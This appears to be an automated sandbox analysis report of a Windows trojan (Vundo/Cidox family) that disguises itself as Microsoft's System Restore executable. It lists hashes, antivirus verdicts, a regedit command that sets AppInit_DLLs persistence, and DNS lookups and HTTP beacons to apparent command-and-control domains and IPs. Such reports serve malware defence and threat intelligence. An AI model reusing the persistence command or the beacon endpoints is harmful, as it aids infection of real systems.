Analysis Date: 2015-05-06 18:22:26
MD5: 717e956da71d9bd62a46f40717d0428b
SHA1: 16f00854ccf517025228bac3415106adbabdd1c0

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section .text: md5: 6c3f1d719a3aadbb96dd357d08a378ed sha1: 1c37364d6b1d4cbc444919cbb7203805c789b839 size: 91648
Section _ASM2: md5: 9cd7316a3c370d5c05281969b65a4660 sha1: ab930fde7701b55eb08891bae098f468727aeffd size: 63488
Section .rdata: md5: 80759194640cd0c281898748a3c7253b sha1: dcb925370efdab1968bdce434442f7fbd7245c68 size: 8192
Section .data: md5: b02138ea20c5701e81389f2009bc03b7 sha1: 7f15f118c4b5e6a88eae0ed33c431eb0ca39b540 size: 5120
Section .tls: md5: bf619eac0cdf3f68d496ea9344137e8b sha1: 5c3eb80066420002bc3dcc7ca4ab6efad7ed4ae5 size: 512
Section .rsrc: md5: c57f9dda23e74dc2dffbaa3c8425f4c6 sha1: b4ae49516f17224939910fb68e13bc1ba5f2c037 size: 34304
Timestamp: 2012-09-25 04:56:32
Version:
LegalCopyright: © Корпорация Майкрософт. Все права защищены.
InternalName: RSTRUI.EXE
FileVersion: 5.1.2600.5512 (xpsp.080413-2108)
CompanyName: Корпорация Майкрософт
ProductName: Операционная система Microsoft® Windows®
ProductVersion: 5.1.2600.5512
FileDescription: Приложение восстановления системы
OriginalFilename: RSTRUI.EXE
Packer: Microsoft Visual C++ ?.?
PEhash: ed7168502630d6f765608bf68788c6f93aa2bee5
IMPhash: 11c52178b812c23b7febf02fc8e99619
AV Ad-Aware: Gen:Variant.Kazy.211341
AV Alwil (avast): Vundo-XF [Trj]
AV Arcabit (arcavir): Gen:Variant.Kazy.211341
AV Authentium: W32/Cidox.A.gen!Eldorado
AV Avira (antivir): TR/Vundo.Gen7
AV BitDefender: Gen:Variant.Kazy.211341
AV BullGuard: Gen:Variant.Kazy.211341
AV CA (E-Trust Ino): no_virus
AV CAT (quickheal): Trojan.Vundo.Gen
AV ClamAV: no_virus
AV Dr. Web: Trojan.Mayachok.17986
AV Emsisoft: Gen:Variant.Kazy.211341
AV Eset (nod32): Win32/Kryptik.AMFU
AV Fortinet: W32/Citirevo.AB!tr
AV Frisk (f-prot): W32/Cidox.A.gen!Eldorado
AV F-Secure: Gen:Variant.Kazy.211341
AV Grisoft (avg): Generic_r.BGN
AV Ikarus: Trojan-Downloader.Win32.Vundo
AV K7: Backdoor ( 04c4f2bf1 )
AV Kaspersky: Trojan.Win32.Generic
AV MalwareBytes: Trojan.FakeMS.ED
AV Mcafee: Vundo-FASV!717E956DA71D
AV Microsoft Security Essentials: TrojanDropper:Win32/Vundo.AA
AV MicroWorld (escan): Gen:Variant.Kazy.211341
AV Padvish: Backdoor.Cidox.rk
AV Rising: no_virus
AV Sophos: Mal/Vundo-M
AV Symantec: Trojan.Gen
AV Trend Micro: TROJ_VUNDO.SMKK
AV Twister: Backdoor.5184F65DEF6B177B
AV VirusBlokAda (vba32): no_virus

Runtime Details:

Process
↳ C:\malware.exe

Creates File: C:\Documents and Settings\Administrator\My Documents\Iterra\0105.tmp
Creates File: C:\Documents and Settings\Administrator\My Documents\Iterra\T03emp03.reg
Deletes File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini
Deletes File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\BSDHA97U\desktop.ini
Deletes File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Deletes File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\IIQ3LGTM\desktop.ini
Deletes File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\desktop.ini
Deletes File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\658HSJSD\desktop.ini
Deletes File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\D4Z32ED8\desktop.ini
Deletes File: C:\Documents and Settings\Administrator\Cookies\index.dat

Process
↳ C:\WINDOWS\Explorer.EXE

Creates File: \Device\Afd\Endpoint
Creates File: C:\Documents and Settings\Administrator\Cookies\cf
Creates File: C:\WINDOWS\system32\edmewoa.dll
Deletes File: C:\Documents and Settings\Administrator\My Documents\Iterra\0105.tmp
Deletes File: C:\Documents and Settings\Administrator\My Documents\Iterra\T03emp03.reg
Creates Process: C:\WINDOWS\regedit.exe /s C:\Documents and Settings\Administrator\My Documents\Iterra\T03emp03.reg
Winsock DNS: clickbeta.ru, denadb.com, 91.220.35.154, terrans.su, tryatdns.com, clickclans.ru, denareclick.com, fescheck.com, instrango.com, verzinla.com, getintsu.com, tegimode.com, netrovad.com, nshouse1.com, veriolana.com, inzavora.com, odobvare.com, foradns.com, getavodes.com, clickstano.com

Process
↳ C:\WINDOWS\regedit.exe /s C:\Documents and Settings\Administrator\My Documents\Iterra\T03emp03.reg

Registry: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\AppInit_DLLs ➝ C:\WINDOWS\system32\edmewoa.dll\\x00

Network Details:

DNS getavodes.com: Type A, 204.11.56.48
DNS tryatdns.com: Type A, 204.11.56.48
DNS instrango.com: Type A, 204.11.56.48
DNS denadb.com: Type A, 204.11.56.48
DNS foradns.com: Type A, 141.8.225.62
DNS veriolana.com: Type A, no address returned
DNS verzinla.com: Type A, no address returned
DNS getintsu.com: Type A, no address returned
DNS fescheck.com: Type A, no address returned
DNS netrovad.com: Type A, no address returned
DNS inzavora.com: Type A, no address returned
DNS odobvare.com: Type A, no address returned
DNS terrans.su: Type A, no address returned
DNS tegimode.com: Type A, no address returned
DNS clickstano.com: Type A, no address returned
DNS denareclick.com: Type A, no address returned
DNS clickbeta.ru: Type A, no address returned
DNS nshouse1.com: Type A, no address returned
DNS clickclans.ru: Type A, no address returned
HTTP GET: http://getavodes.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=991&av=0&vm=0&al=0&p=567&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg7QMsiS3YGpeqZSlgt+V1m4Q6O23qnsotScfpT4Wm9yy
User-Agent: (empty)
HTTP GET: http://tryatdns.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=991&av=0&vm=0&al=0&p=567&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg7QMsiS3YGpeqZSlgt+V1m4Q6O23qnsotVQWSDufAQbz
User-Agent: (empty)
HTTP GET: http://instrango.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=991&av=0&vm=0&al=0&p=567&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg7QMsiS3YGpeqZSlgt+V1m4Q6O23qnsotSxoYooL9EZM
User-Agent: (empty)
HTTP GET: http://denadb.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=991&av=0&vm=0&al=0&p=567&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg7QMsiS3YGpeqZSlgt+V1m4Q6O23qnsotZsMSMiS09by
User-Agent: (empty)
HTTP GET: http://foradns.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=991&av=0&vm=0&al=0&p=567&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg7QMsiS3YGpeqZSlgt+V1m4Q6O23qnsote8cVxmzTldB
User-Agent: (empty)
HTTP GET: http://91.220.35.154/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=991&av=0&vm=0&al=0&p=567&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg7QMsiS3YGpeqZSlgt+V1m4Q6O23qnsotaArFa26dot/
User-Agent: (empty)
Flows TCP: 192.168.1.1:1031 ➝ 204.11.56.48:80
Flows TCP: 192.168.1.1:1032 ➝ 204.11.56.48:80
Flows TCP: 192.168.1.1:1033 ➝ 204.11.56.48:80
Flows TCP: 192.168.1.1:1034 ➝ 204.11.56.48:80
Flows TCP: 192.168.1.1:1035 ➝ 141.8.225.62:80
Flows TCP: 192.168.1.1:1036 ➝ 91.220.35.154:80

Strings